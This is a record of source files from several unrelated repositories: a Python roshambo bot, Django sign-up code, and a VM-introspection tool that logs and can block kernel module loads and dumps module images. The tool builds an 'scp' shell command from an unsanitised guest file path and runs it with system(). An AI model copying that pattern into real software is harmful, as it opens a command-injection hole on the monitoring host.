len(my_moves) # the number of trials completed\n last_move_index = num - 1\n if num:\n i = last_move_index - 1 # start reverse loop at 2nd last move\n j = None\n while i > last_move_index - age and i > best_length and j <= num/2:\n j = match_both(i) if moves is None else match_single(i,moves)\n if j > best_length:\n best_length = j\n best = i #this is going to be used as index,but here it is slice endpoint, so don't need to +1\n i -= 1\n return best\n\n class stats:\n counts = [[0,0,0]]\n def add(self,i,delta):\n self.counts[-1][i] += delta\n def next(self):\n self.counts.append(self.counts[-1][:])\n def max(self,age,score):\n which = None\n if age >= len(self.counts):\n diff, i = max((c,i) for i,c in enumerate(self.counts[-1]))\n else:\n diff, i = max((c-d,i) for i,(c,d) in enumerate(izip(self.counts[-1], self.counts[-1 - age])))\n if diff > score:\n score = diff\n which = i\n return which, score\n\n class predict:\n st = stats()\n last = None\n def do_predict(self,move):\n if self.last is not None: #opp_moves:\n diff = (3 + rps_to_num[opp_moves[-1]] - self.last) % 3\n self.st.add(superior[diff], 1)\n self.st.add(inferior[diff], -1)\n self.st.next()\n self.last = move\n def scan_predict(self,age,move,score):\n which, score = self.st.max(age,score)\n new_move = move if which is None else ((self.last + which) % 3)\n return new_move, score\n\n # begin logic\n\n if not my_moves:\n player.pr_history = [[[predict() for k in xrange(2)] for j in xrange(3)] for _ in ages]\n player.pr_freq = [[predict() for k in xrange(2)] for _ in ages]\n player.pr_fixed = predict()\n player.pr_random = predict()\n player.pr_meta = [predict() for _ in ages]\n player.statz = [stats(),stats()]\n else:\n player.statz[0].add(rps_to_num[my_moves[-1]],1)\n player.statz[1].add(rps_to_num[opp_moves[-1]],1)\n\n for a,age in enumerate(ages):\n best = [match_history(age,my_moves), match_history(age,opp_moves), match_history(age,None)]\n for w,b in enumerate(best):\n player.pr_history[a][w][0].do_predict(guess if b==0 else rps_to_num[my_moves[b]])\n player.pr_history[a][w][1].do_predict(guess if b==0 else 
rps_to_num[opp_moves[b]])\n for p in xrange(2):\n which, _ = player.statz[p].max(age,None)\n player.pr_freq[a][p].do_predict(which if which is not None else guess)\n\n player.pr_random.do_predict(guess)\n player.pr_fixed.do_predict(0)\n\n for a,age in enumerate(ages):\n move = score = None\n for aa, _ in enumerate(ages):\n for p in xrange(2):\n for w in xrange(3):\n move, score = player.pr_history[aa][w][p].scan_predict(age, move, score)\n move, score = player.pr_freq[aa][p].scan_predict(age, move, score)\n move, score = player.pr_random.scan_predict(age, move, score)\n move, score = player.pr_fixed.scan_predict(age, move, score)\n player.pr_meta[a].do_predict(move)\n\n move = score = None\n for meta in player.pr_meta:\n move, score = meta.scan_predict(TRIALS, move, score) #REVIEW\n return rps_to_text[move]\n\n\n" }, { "alpha_fraction": 0.7730769515037537, "alphanum_fraction": 0.7730769515037537, "avg_line_length": 42.33333206176758, "blob_id": "b9f0a9ce21ae9b684c609c00f4d9ea1c62177e78", "content_id": "27b7b8bbfea6efccfe520aa71645f65e0dd1bca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 260, "license_type": "no_license", "max_line_length": 146, "num_lines": 6, "path": "/README.md", "repo_name": "erdman/roshambo", "src_encoding": "UTF-8", "text": "roshambo\n========\n\nRoshambo bots including Python translations of Dan Egnor's Iocaine Powder and Andrzej Nagorko's Greenberg.\n\nThe Greenberg bot appears to be complete and functional, but Iocaine Powder still has a bug somewhere. Pull requests accepted if you can find it.\n" } ]
2
carlcastello/BabySittingApp
https://github.com/carlcastello/BabySittingApp
e8ac56ed08dcef988f663dd3d44b2ef319c1f908
6538086bc6eb0ad1e47be429f04008541468ea79
f7032664cdfb3fd0efd3c8ef72ad20ef9f1d855f
refs/heads/master
2021-08-09T01:26:46.090299
2017-11-11T19:38:26
2017-11-11T19:38:26
106,501,481
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7201166152954102, "alphanum_fraction": 0.7201166152954102, "avg_line_length": 30.090909957885742, "blob_id": "1f7bc806d60ac00af0b09891a3dd16677b81a677", "content_id": "525b3dcc56b3e1a667898d68837bc82603ff08d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 66, "num_lines": 11, "path": "/customer_portal_project/customer_portal/views/Authentication.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "\nfrom django.views import View\nfrom django.shortcuts import render\nfrom customer_portal.form.UserCreationForm import UserCreationForm\n\n\nclass SignUp(View):\n template_name = \"auth/sign_up.html\"\n\n def get(self, request, *args, **kwargs):\n form = UserCreationForm()\n return render(request, self.template_name, {'form': form})\n" }, { "alpha_fraction": 0.4129098355770111, "alphanum_fraction": 0.4308401644229889, "avg_line_length": 26.885713577270508, "blob_id": "152066f2504e22d9637fcdb99132f8e2e29bf758", "content_id": "cb0c313c7abbd5ee4dca57189f3a023731c732b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3904, "license_type": "no_license", "max_line_length": 105, "num_lines": 140, "path": "/customer_portal_project/customer_portal/form/UserCreationForm.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "from django.forms import Form, CharField, EmailField, TextInput\nfrom django.core.validators import MaxLengthValidator, MinLengthValidator, RegexValidator, EmailValidator\n\n\nclass UserCreationForm(Form):\n\n first_name = CharField(\n validators=[\n RegexValidator(regex=\"^[a-zA-Z]+$\", message=None),\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"pattern\": \"^[a-zA-Z]+$\",\n \"placeholder\": \"John\",\n \"maxlength\": 100,\n \"data-minlength\": 5,\n \"data-error\": \"\"\n }\n )\n )\n\n last_name = CharField(\n validators=[\n RegexValidator(regex=\"^[a-zA-Z]+$\", message=None),\n MinLengthValidator(2, message=None),\n MaxLengthValidator(30, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"pattern\": \"^[a-zA-Z]+$\",\n \"placeholder\": \"Smith\",\n \"maxlength\": 30,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n email = EmailField(\n validators=[\n EmailValidator(message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"email\",\n \"class\": \"form-control\",\n \"placeholder\": \"[email protected]\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n contact_number = CharField(\n validators=[\n RegexValidator(regex=\"^\\+?1?\\d{9,15}$\", message=None),\n MinLengthValidator(10, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"placeholder\": \"123 456 7890\",\n \"maxlength\": 20,\n \"data-minlength\": 10,\n \"data-error\": \"\"\n }\n )\n )\n\n address = CharField(\n validators=[\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"text\",\n \"class\": \"form-control\",\n \"placeholder\": \"123 45th Street\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n password = CharField(\n validators=[\n 
MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"password\",\n \"class\": \"form-control\",\n \"placeholder\": \"Password\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-error\": \"\"\n }\n )\n )\n\n confirm_password = CharField(\n validators=[\n MinLengthValidator(5, message=None),\n MaxLengthValidator(100, message=None)\n ],\n widget=TextInput(\n attrs={\n \"type\": \"password\",\n \"class\": \"form-control\",\n \"placeholder\": \"Password\",\n \"maxlength\": 100,\n \"data-minlength\": 2,\n \"data-match\": \"#id_password\",\n \"data-error\": \"\"\n }\n )\n )\n\n class Meta:\n fields = (\n \"first_name\",\n \"last_name\",\n \"email\",\n \"contact_number\",\n \"address\",\n \"password\",\n \"confirm_password\"\n )\n" }, { "alpha_fraction": 0.7941176295280457, "alphanum_fraction": 0.7941176295280457, "avg_line_length": 26.200000762939453, "blob_id": "e6a12ce491de18345dddd6e5575437fb2f34a0af", "content_id": "031cf58bb386a0abad11983f89d6d23a651dd268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 54, "num_lines": 5, "path": "/customer_portal_project/customer_portal/views/ProfilePortal.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "\nfrom django.views.generic import TemplateView\n\n\nclass ProfileView(TemplateView):\n template_name = \"profile_portal/profile_view.html\"" }, { "alpha_fraction": 0.7235293984413147, "alphanum_fraction": 0.7235293984413147, "avg_line_length": 38.30769348144531, "blob_id": "8a5679efe1b94715d6ef232b8e8c887a4ad86d0c", "content_id": "df3666fb3b33c2709b069961d7e6bc85578dbb9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 87, "num_lines": 13, "path": "/customer_portal_project/customer_portal/urls.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom customer_portal.views.CustomerPortal import HomeView, ServicesView\nfrom customer_portal.views.Authentication import SignUp\nfrom customer_portal.views.ProfilePortal import ProfileView\n\nurlpatterns = [\n url(r'^$', HomeView.as_view(), name='home'),\n url(r'^user/register$', SignUp.as_view(), name='register'),\n url(r'^user/profile/(?P<profile_id>\\w+)+$', ProfileView.as_view(), name='profile'),\n url(r'^user/services', ServicesView.as_view(), name='services')\n\n]" } ]
4
SagaBegins/vmwatch
https://github.com/SagaBegins/vmwatch
f7869015e34ff754f27556e809ad628b32581715
e6ac943d7d112cce15931462b799247cd8fa0803
2f021daf481b325706142adb3c06e3471f24d629
refs/heads/main
2023-07-11T20:40:55.858779
2021-08-28T14:35:43
2021-08-28T14:35:43
399,683,161
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6141242980957031, "alphanum_fraction": 0.6230508685112, "avg_line_length": 27.637540817260742, "blob_id": "24f0432c41039fc7927ef2145540293eb7795bd3", "content_id": "80d8bf910912456b76b289f622f01c18dff08cf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8850, "license_type": "no_license", "max_line_length": 144, "num_lines": 309, "path": "/libvmtrace/apps/plugins/SyscallLogger.cpp", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#include <plugins/SyscallLogger.hpp>\n#include <sys/LinuxVM.hpp>\n#include <string.h>\n#include <fstream>\n#include <time.h>\n#include <ctime>\n#include <cmath>\n#include <unistd.h>\n\nusing namespace rapidjson;\nusing std::chrono::duration_cast;\nusing std::chrono::milliseconds;\nusing std::chrono::seconds;\nusing std::chrono::system_clock;\n\n\nnamespace libvmtrace\n{\n\tconst std::string SyscallLogger::ExecuteCommand(const std::string command, \n\t\t\t\t\tconst std::vector<std::string> params,\n\t\t\t\t\tconst std::string command_id,\n\t\t\t\t\tconst std::string vm_id)\n\t{\n\t\tif(vm_id != _vm_id)\n\t\t{\n\t\t\treturn \"\";\n\t\t}\n\t\n\t\tif(command == \"Trace\" && params.size() > 0)\n\t\t{\n\t\t\tfor(auto x : params)\n\t\t\t{\n\t\t\t\tint nr = atoi(x.c_str());\n\t\t\t\tif (_events[nr] == NULL)\n\t\t\t\t{\n\t\t\t\t\tif(nr == 59) // exec does not return\n\t\t\t\t\t{\t\n\t\t\t\t\t\t_events[nr] = new SyscallEvent(nr, *this, false, false, _json);\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t_events[nr] = new SyscallEvent(nr, *this, _return_value, false, _json);\n\t\t\t\t\t}\n\n\t\t\t\t\t_os.RegisterSyscall(*_events[nr]);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse if(command == \"Untrace\" && params.size() > 0)\n\t\t{\n\t\t\tfor(auto x : params)\n\t\t\t{\n\t\t\t\tint nr = atoi(x.c_str());\n\t\t\t\tif(_events[nr] != nullptr)\n\t\t\t\t{\n\t\t\t\t\t_os.DeRegisterSyscall(*_events[nr]);\n\t\t\t\t\tdelete _events[nr];\n\t\t\t\t\t_events[nr] = nullptr;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn \"\";\n\t}\n\n\tbool SyscallLogger::callback(const Event* ev, void* data)\n\t{\n\t\tconst SyscallEvent* sev = dynamic_cast<const SyscallEvent*>(ev);\n\t\tLinuxVM *lvm = dynamic_cast<LinuxVM*> (&_os);\n\t\t\n\t\tif(!sev)\n\t\t{\n\t\t\treturn false;\n\t\t}\n\t\tSyscallBasic* s = (SyscallBasic*)data;\n\n\n\t\tstd::string json = s->ToJson();\n\n\t\tDocument document;\n\t\tdocument.Parse(json.c_str());\n\t\tDocument::AllocatorType& allocator = document.GetAllocator();\n\t\tconst int BUFFER_LEN = 10000;\n\n\t\ttry\n\t\t{\n\t\t\tconst Process& p = _pc.GetProcessFromDtb(s->GetDtb());\n\t\t\tstd::string name = p.GetName();\n\t\t\tstd::string pwd = p.GetPwd();\n\n\t\t\tdocument.AddMember(\"proc_name\", Value(name.c_str(), allocator).Move(), allocator);\n\t\t\tdocument.AddMember(\"uid\", p.GetUid(), allocator);\n\n\t\t\tdocument.AddMember(\"pwd\", Value(pwd.c_str(), allocator).Move(), allocator);\n\t\t}\n\t\tcatch(...)\n\t\t{\n\t\t\tdocument.AddMember(\"proc_name\", \"ERR\", allocator);\n\t\t\tdocument.AddMember(\"uid\", 0, allocator);\n\t\t\tdocument.AddMember(\"pwd\", \"ERR\", allocator);\n\t\t}\n\t\t\n\t\tconst std::string USR_MODULE = \"/usr/lib/modules/\"; // len 17\n\t\tconst std::string LIB_MODULE = \"/lib/modules/\"; // len 13\n\n\t\tif(s->GetNr() == 1)\n\t\t{\n\t\t\tProcess p = lvm->GetCurrentProcess(s->GetRegisters().gs_base);\n\t\t\t// GetOpenFiles extracts file names from task_struct; the second\n\t\t\t// parameter is a filter that selects a specific file 
descriptor\n\t\t\tstd::vector<OpenFile> ofv = lvm->GetOpenFiles(p, s->GetParameter(0));\n\t\t\tif(ofv.size()>0) \n\t\t\t{ \n\t\t\t\tstd::string path = ofv[0].path; \n\t\t\t\t// copy the string into the document: path goes out of scope before serialization\n\t\t\t\tdocument.AddMember(\"fileName\", Value(path.c_str(), allocator).Move(), allocator);\n\t\t\t}\n\t\t}\n\t\telse if(s->GetNr() == 2)\n\t\t{\n\t\t\tstd::string path = \"EMPTY PATH\";\n\t\t\tstd::string pwd = \"EMPTY PWD\";\n\t\t\tif (document.HasMember(\"path\"))\n\t\t\t path = document[\"path\"].GetString();\n\t\t\tif (document.HasMember(\"pwd\"))\n\t\t\t pwd = document[\"pwd\"].GetString();\n\n\t\t\tstd::string fullPath = path;\n\t\t\tif(!path.empty())\n\t\t\t{\n\t\t\t\tstd::string tmp = path.substr(0,1);\n\t\t\t\tif(tmp.compare(\"/\") != 0)\n\t\t\t\t{\n\t\t\t\t\tfullPath = pwd+\"/\"+path;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tValue sa(fullPath.c_str(), allocator); // copy: fullPath is local to this branch\n\t\t\tdocument.AddMember(\"fullPath\", sa, allocator);\n\t\t}\n\t\telse if(s->GetNr() == 175)\n\t\t{ \n\t\t\t// When process uses init_module(void *image, unsigned long len, char *param)\n\t\t\t// it is paused and when the prevent flag is true the address is changed to prevent \n\t\t\t// it being called. The image of the module is dumped in /root/modwatch/dumps/dump-[time-stamp].bin \n\n\t\t\tstd::cout << std::endl; \n\t\t\tProcess p = lvm->GetCurrentProcess(s->GetRegisters().gs_base);\t\t\n\t\t\t\n\t\t\tauto _sm = lvm->GetSystemMonitor();\n\t\t\tconst auto vmi = _sm->Lock();\n\n\t\t\tunsigned long file_length = s->GetParameter(1);\n\t\t\tconst addr_t param_pointer = s->GetParameter(2);\n\t\t\tchar param[BUFFER_LEN];\n\t\t\t\n\t\t\tchar* val = vmi_read_str_va(vmi, param_pointer, p.GetPid());\n\t\t\tif(val)\n\t\t\t{\n\t\t\t\tsnprintf(param, BUFFER_LEN, \"%s\", val);\n\t\t\t\tfree(val); // vmi_read_str_va returns a malloc'd string\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tparam[0] = '\\0';\n\t\t\t}\n\n\t\t\tdocument.AddMember(\"param\", Value(param, allocator).Move(), allocator);\n\t\t\tdocument.AddMember(\"fileLength\", file_length, allocator);\n\t\t\t\n\t\t\tif(_prevent) \n\t\t\t{\n\t\t\t\taddr_t addr = 0;\n\n\t\t\t\t#ifdef INTROSPECT_PTREGS\n\t\t\t\t\t// Use LibVMI to write RSI in ptreg data structure\n\t\t\t\t\taddr_t offset = 0;\n\t\t\t\t\tvmi_get_kernel_struct_offset(vmi, \"pt_regs\", \"si\", &offset);\n\t\t\t\t\taddr_t rsi = s->GetRegisters().rdi + offset;\n\t\t\t\t\tint st = vmi_write_64_va(vmi, rsi, 0, &addr);\n\t\t\t\t#else\n\t\t\t\t\t// Use LibVMI to set VCPU register RSI (2nd argument) to 0\n\t\t\t\t\tint st = vmi_set_vcpureg(vmi, addr, RSI, 0);\n\t\t\t\t#endif\n\t\t\t}\n\n\t\t\tif(file_length) \n\t\t\t{\n\t\t\t\tauto ts = duration_cast<milliseconds>(system_clock::now().time_since_epoch()).count();\n\t\t\t\tchar image_name[1000];\n\t\t\t\tsprintf(image_name, \"/root/modwatch/dumps/dump-%llu.bin\", ts);\n\n\t\t\t\tstd::ofstream outdata_image;\n\t\t\t\toutdata_image.open(image_name, std::ios::binary);\n\t\t\t\t\n\t\t\t\tunsigned long long times_to_loop = file_length/BUFFER_LEN; \t\t\t\t\t\n\t\t\t\tuint64_t* data;\n\t\t\t\tchar* bin_data;\n\t\t\t\tconst addr_t image_addr = s->GetParameter(0);\n\t\t\t\taddr_t next_addr = image_addr;\n\n\t\t\t\t// Begin writing dump\n\t\t\t\tfor(unsigned long long i = 0; i < times_to_loop; ++i) \n\t\t\t\t{\n\t\t\t\t\tdata = new uint64_t[BUFFER_LEN];\n\n\t\t\t\t\t// Reading data of BUFFER_LEN into data\n\t\t\t\t\tvmi_read_va(vmi, next_addr, p.GetPid(), BUFFER_LEN, data, NULL);\n\t\t\t\t\t\n\t\t\t\t\tbin_data = static_cast<char*>(static_cast<void*>(data));\n\n\t\t\t\t\toutdata_image.write(bin_data, BUFFER_LEN);\n\t\t\t\t\toutdata_image.flush();\n\n\t\t\t\t\tnext_addr += BUFFER_LEN;\n\t\t\t\t\tdelete[] data;\n\t\t\t\t}\n\n\t\t\t\t// Getting the remainder\n\t\t\t\tunsigned long long remaining = file_length%BUFFER_LEN;\n\t\t\t\tdata = new uint64_t[remaining];\n\t\t\t\tvmi_read_va(vmi, next_addr, p.GetPid(), remaining, data, NULL);\n\t\t\t\t\n\t\t\t\tbin_data = static_cast<char*>(static_cast<void*>(data));\n\t\t\t\toutdata_image.write(bin_data, remaining);\n\n\t\t\t\toutdata_image.flush();\n\t\t\t\toutdata_image.close();\t\n\t\t\t\tdelete[] data; // release the remainder buffer\n\t\t\t\t// End writing dump\t\t\t\n\t\t\t}\n\t\t\t\n\t\t\t_sm->Unlock();\n\t\t}\n\t\telse if(s->GetNr() == 313)\n\t\t{\n\t\t\t// When process uses finit_module(int fd, char *param, int flags)\n\t\t\t// it is paused and when the prevent flag is true and the module file is not in the usual directories,\n\t\t\t// the address is changed to prevent it being called. \n\t\t\t// The image of the module is dumped in /root/modwatch/dumps/dump-[time-stamp].bin \n\n\t\t\tstd::cout << std::endl;\n\t\t\tProcess pr = lvm->GetCurrentProcess(s->GetRegisters().gs_base);\n\t\t\tstd::vector<OpenFile> ofv = lvm->GetOpenFiles(pr, s->GetParameter(0));\n\t\t\t\n\t\t\tint fd = s->GetParameter(0);\n\t\t\tint flags = s->GetParameter(2);\n\n\t\t\tdocument.AddMember(\"fd\", fd, allocator);\n\t\t\tdocument.AddMember(\"flags\", flags, allocator);\n\t\t\t\n\t\t\tif(ofv.size()>0) \n\t\t\t{ \t\n\t\t\t\tstd::string path = ofv[0].path; \n\t\t\t\tchar path_buffer[BUFFER_LEN]; \n\t\t\t\tsprintf(path_buffer, \"%s\", path.c_str()); // Helps prevent weird unicode from being printed\n\n\t\t\t\tdocument.AddMember(\"filename\", Value(path_buffer, allocator).Move(), allocator);\n\t\t\t\t\n\t\t\t\tauto _sm = lvm->GetSystemMonitor();\n\t\t\t\tconst auto vmi = _sm->Lock();\t\n\t\t\t\t\n\t\t\t\tchar param_buffer[BUFFER_LEN];\n\t\t\t\taddr_t param_addr = s->GetParameter(1);\n\t\t\t\tchar *params = vmi_read_str_va(vmi, param_addr, pr.GetPid());\n\t\n\t\t\t\tif (params != NULL) \n\t\t\t\t{\n\t\t\t\t\tsnprintf(param_buffer, BUFFER_LEN, \"%s\", params);\n\t\t\t\t\tdocument.AddMember(\"param\", Value(param_buffer, allocator).Move(), allocator);\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tfree(params); // allocated by vmi_read_str_va; free(NULL) is a no-op\n\t\t\t\t\n\t\t\t\tif(_prevent && !(USR_MODULE.compare(path.substr(0, USR_MODULE.length())) == 0 || LIB_MODULE.compare(path.substr(0, LIB_MODULE.length())) == 0) ) \n\t\t\t\t{\n\t\t\t\t\t// the introspection lock is already held at this point\n\t\t\t\t\taddr_t addr = 0;\n\t\t\t\t\t#ifdef INTROSPECT_PTREGS\n\t\t\t\t\t\t// Use LibVMI to write RSI in ptreg data structure\n\t\t\t\t\t\taddr_t offset = 0;\n\t\t\t\t\t\tvmi_get_kernel_struct_offset(vmi, \"pt_regs\", \"si\", &offset);\n\t\t\t\t\t\taddr_t rsi = s->GetRegisters().rdi + offset;\n\n\t\t\t\t\t\tint st = vmi_write_64_va(vmi, rsi, 0, &addr);\n\t\t\t\t\t#else\n\t\t\t\t\t\t// Use LibVMI to set VCPU register RSI (2nd argument) to 0\n\t\t\t\t\t\tint st = vmi_set_vcpureg(vmi, addr, RSI, 0);\n\t\t\t\t\t#endif\n\t\t\t\t}\n\n\t\t\t\tauto ts = duration_cast<milliseconds>(system_clock::now().time_since_epoch()).count();\n\t\t\t\tchar dump_path[BUFFER_LEN];\n\t\t\t\tsprintf(dump_path, \"/root/modwatch/dumps/dump-%llu.bin\", ts);\n\t\t\t\tchar SCP_COMMAND[BUFFER_LEN];\n\t\t\t\tsnprintf(SCP_COMMAND, BUFFER_LEN, \"scp 192.168.13.245:%s %s\", path_buffer, dump_path);\n\t\t\t\tsystem(SCP_COMMAND);\n\n\t\t\t\t_sm->Unlock(); // release the lock taken above\n\t\t\t}\n\t\t}\n\t// #endif\n\n\t\tdocument.RemoveMember(\"dtb\");\n\t\tdocument.RemoveMember(\"rsp\");\n\t\tdocument.RemoveMember(\"rip\");\n\t\tdocument.RemoveMember(\"syscall_name\");\n\t\tdocument.RemoveMember(\"logtype\");\n\t\t\n\t\tStringBuffer strbuf;\n\t\tWriter<StringBuffer> writer(strbuf);\n\t\tdocument.Accept(writer);\n\n\t\t_log.log(_vm_id, _log_name, 
strbuf.GetString());\n\n\t\treturn false;\n\t}\n}\n\n" }, { "alpha_fraction": 0.6574074029922485, "alphanum_fraction": 0.7222222089767456, "avg_line_length": 28.454545974731445, "blob_id": "000e7e2fa4b8e26661b233d26fcf763f09a38acf", "content_id": "dfe5d76e9b104dd703c8b006dcc61eebb1c8636b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 64, "num_lines": 11, "path": "/scripts/server.py", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "import socket\n\n#socket.SOCK_STREAM indicates TCP\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserversocket.bind((\"192.168.13.245\", 12345))\nwhile(True):\n    serversocket.listen(1)\n\n    ( clientsocket, address) = serversocket.accept()\n    msg = clientsocket.recv(1024)\n    print (\"server received \"+msg)\n" }, { "alpha_fraction": 0.6484975814819336, "alphanum_fraction": 0.6603773832321167, "avg_line_length": 20.44285774230957, "blob_id": "73b117527a67b4c4b99060f4f7e428b9f4457a6a", "content_id": "edb7dddd99f1309c285eccf805b9bb3c0c8d7a7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1431, "license_type": "no_license", "max_line_length": 70, "num_lines": 70, "path": "/libvmtrace/csec.cpp", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "#include <libvmi/libvmi.h>\n#include <libvmtrace.hpp>\n#include <sys/LinuxVM.hpp>\n#include <plugins/Plugins.hpp>\n\nusing namespace libvmtrace;\nusing namespace libvmtrace::util;\n\nstd::shared_ptr<SystemMonitor> _sm;\nstd::shared_ptr<LinuxVM> _linux;\n\nstatic bool interrupted = false;\nstatic void close_handler(int sig)\n{\n\tif (sig == SIGSEGV) \n\t{\n\t\t_linux = nullptr;\n\t\t_sm = nullptr;\n\t}\n\n\tinterrupted = true;\n}\n\nint main(int argc, char* argv[]) \n{\n\tbool prevent = false;\n\n\tif (argc == 1)\n\t{\n\t\tstd::cout << argv[0] << \" <vmname>\" << \" [1]\" << std::endl;\n\t\treturn -1;\n\t}\n\n\tif (argc == 3)\n\t\tprevent = atoi(argv[2]);\n\n\tstd::string vm_id = argv[1];\n\n\tstruct sigaction act;\n\tact.sa_handler = close_handler;\n\tact.sa_flags = 0;\n\tsigemptyset(&act.sa_mask);\n\tsigaction(SIGHUP, &act, NULL);\n\tsigaction(SIGTERM, &act, NULL);\n\tsigaction(SIGINT, &act, NULL);\n\tsigaction(SIGALRM, &act, NULL);\n\tsigaction(SIGPIPE, &act, NULL);\n\n\t_sm = std::make_shared<SystemMonitor>(vm_id, true);\n\t_linux = std::make_shared<LinuxVM>(_sm);\n\tProcessCache pc(*_linux);\n\n\tLog* log = new Log();\n\tlog->RegisterLogger(new StdoutLogger(false));\n\n\tSyscallLogger sl(vm_id, *_linux, pc, *log, prevent, true, false);\n\tController c;\n\tc.RegisterPlugin(sl);\n\n\tstd::vector<std::string> calls_to_log;\n\tcalls_to_log.push_back(\"175\");\n\tcalls_to_log.push_back(\"313\");\n\t\n\tc.ExecuteCommand(\"SyscallLogger\", \"Trace\", calls_to_log, \"0\", vm_id);\n\n\twhile(!interrupted) \n\t\tsleep(1);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6348791718482971, "alphanum_fraction": 0.6394513249397278, "avg_line_length": 23.661291122436523, "blob_id": "33bc3fb570f7a7bc7c48790a465a30ba59317bf2", "content_id": "8219189a4cc6df05cc999fc55257801329ddcc92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1531, "license_type": "no_license", "max_line_length": 134, "num_lines": 62, "path": "/libvmtrace/apps/plugins/SyscallLogger.hpp", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "\n#ifndef __SYSCALL_LOGGER__\n#define 
__SYSCALL_LOGGER__\n\n#include <libvmi/libvmi.h>\n#include <libvmtrace.hpp>\n\nnamespace libvmtrace\n{\n\tclass SyscallLogger : public util::Plugin, public EventListener\n\t{\n\t\tpublic:\n\t\t\tSyscallLogger(std::string vm_id, OperatingSystem& os, ProcessCache& pc, util::Log& log, bool prevent)\n\t\t\t\t: SyscallLogger(vm_id, os, pc, log, prevent, true, true) { };\n\n\t\t\tSyscallLogger(std::string vm_id, OperatingSystem& os, ProcessCache& pc, util::Log& log, bool prevent, bool json, bool return_value)\n\t\t\t\t: _vm_id(vm_id), _os(os), _pc(pc), _log(log), _prevent(prevent), _json(json), _return_value(return_value)\n\t\t\t{\n\t\t\t\t_commands.push_back(\"Trace\");\n\t\t\t\t_commands.push_back(\"Untrace\");\n\n\t\t\t\tfor (int i = 0; i < 600; i++)\n\t\t\t\t\t_events[i] = nullptr;\n\n\t\t\t\t_log_name = \"sys_syscall_\"+vm_id;\n\t\t\t}\n\n\t\t\tconst std::string ExecuteCommand(const std::string command, const std::vector<std::string> params,\n\t\t\t\t\t\t\t\tconst std::string command_id, const std::string vm_id);\n\n\t\t\tconst std::string GetName() const\n\t\t\t{\n\t\t\t\treturn \"SyscallLogger\";\n\t\t\t}\n\n\t\t\tconst std::vector<std::string> GetListCommands() const\n\t\t\t{\n\t\t\t\treturn _commands;\n\t\t\t}\n\n\t\t\tconst void Stop()\n\t\t\t{\n\t\t\t\tstd::cout << \"STOP\" << std::endl;\n\t\t\t}\n\n\t\t\tbool callback(const Event* ev, void* data);\n\n\t\tprivate:\n\t\t\tstd::string _vm_id;\n\t\t\tOperatingSystem& _os;\n\t\t\tSyscallEvent* _events[600];\n\t\t\tProcessCache& _pc;\n\t\t\tutil::Log& _log;\n\t\t\tbool _json;\n\t\t\tbool _return_value;\n\t\t\tbool _prevent;\n\n\t\t\tstd::vector<std::string> _commands;\n\t\t\tstd::string _log_name;\n\t};\n}\n\n#endif\n\n" }, { "alpha_fraction": 0.49725252389907837, "alphanum_fraction": 0.5992100834846497, "avg_line_length": 69.11573028564453, "blob_id": "6940409b99f2f8b308340ebff0035c9ad8b", "content_id": "0ce5686225851c343a7798973f17539a6a05ade0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 23294, "license_type": "no_license", "max_line_length": 498, "num_lines": 337, "path": "/README.md", "repo_name": "SagaBegins/vmwatch", "src_encoding": "UTF-8", "text": "Vidya Sagar @sagabegins \nMohamed Anis @AnisBoudj \n\n## Section 1: Implement a volatility3 plugin for network connections\n\nA volatility plugin named **findsocket.py** was implemented to find the details of network connections on 